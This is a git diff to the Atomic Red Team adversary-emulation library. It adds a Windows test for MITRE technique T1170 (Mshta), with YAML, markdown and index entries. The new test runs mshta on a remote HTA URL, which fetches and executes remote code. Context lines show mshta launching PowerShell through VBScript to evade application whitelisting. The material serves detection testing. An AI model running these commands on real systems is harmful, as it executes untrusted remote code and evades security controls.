diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/T1170.hta new file mode 100644 index 00000000..59101b61 --- /dev/null +++ b/atomics/T1170/T1170.hta @@ -0,0 +1,12 @@ + + + + + + + + + \ No newline at end of file diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md index b90a6ac2..07e032d7 100644 --- a/atomics/T1170/T1170.md +++ b/atomics/T1170/T1170.md @@ -18,6 +18,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a - [Atomic Test #3 - Mshta executes VBScript to execute malicious command](#atomic-test-3---mshta-executes-vbscript-to-execute-malicious-command) +- [Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-4---mshta-executes-remote-html-application-hta) +
@@ -82,4 +84,25 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit +
+
+ +## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA) +Execute an arbitrary remote HTA. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta| + +#### Run it with `command_prompt`! +``` +mshta #{hta_url} +``` + + +
diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 81ad4b11..5c77f4cd 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -51,4 +51,20 @@ atomic_tests: executor: name: command_prompt command: | - mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") \ No newline at end of file + mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") + +- name: Mshta Executes Remote HTML Application (HTA) + description: | + Execute an arbitrary remote HTA. + + supported_platforms: + - windows + input_arguments: + hta_url: + description: URL to HTA file for execution + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta + executor: + name: command_prompt + command: | + mshta #{hta_url} \ No newline at end of file diff --git a/atomics/index.md b/atomics/index.md index 0d20e9d0..52300ebb 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -300,6 +300,7 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows] + - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows] - [T1096 NTFS File Attributes](./T1096/T1096.md) - Atomic Test #1: Alternate Data Streams (ADS) [windows] - [T1126 Network Share Connection Removal](./T1126/T1126.md) @@ -682,6 +683,7 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows] + - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows] - [T1086 PowerShell](./T1086/T1086.md) - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: BloodHound [windows] diff --git a/atomics/index.yaml b/atomics/index.yaml index 4e1bd378..02954daf 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -8913,7 +8913,23 @@ defense-evasion: executor: name: command_prompt command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell - -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")' + -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") + +' + - name: Mshta Executes Remote HTML Application (HTA) + description: 'Execute an arbitrary remote HTA. + +' + supported_platforms: + - windows + input_arguments: + hta_url: + description: URL to HTA file for execution + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta + executor: + name: command_prompt + command: 'mshta #{hta_url}' T1096: technique: x_mitre_data_sources: @@ -19406,7 +19422,23 @@ execution: executor: name: command_prompt command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell - -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")' + -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") + +' + - name: Mshta Executes Remote HTML Application (HTA) + description: 'Execute an arbitrary remote HTA. + +' + supported_platforms: + - windows + input_arguments: + hta_url: + description: URL to HTA file for execution + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta + executor: + name: command_prompt + command: 'mshta #{hta_url}' T1086: technique: x_mitre_permissions_required: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 3a35379e..1f5dcc1a 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -100,6 +100,7 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows] + - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows] - [T1096 NTFS File Attributes](./T1096/T1096.md) - Atomic Test #1: Alternate Data Streams (ADS) [windows] - [T1126 Network Share Connection Removal](./T1126/T1126.md) @@ -544,6 +545,7 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows] - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows] + - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows] - [T1086 PowerShell](./T1086/T1086.md) - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: BloodHound [windows]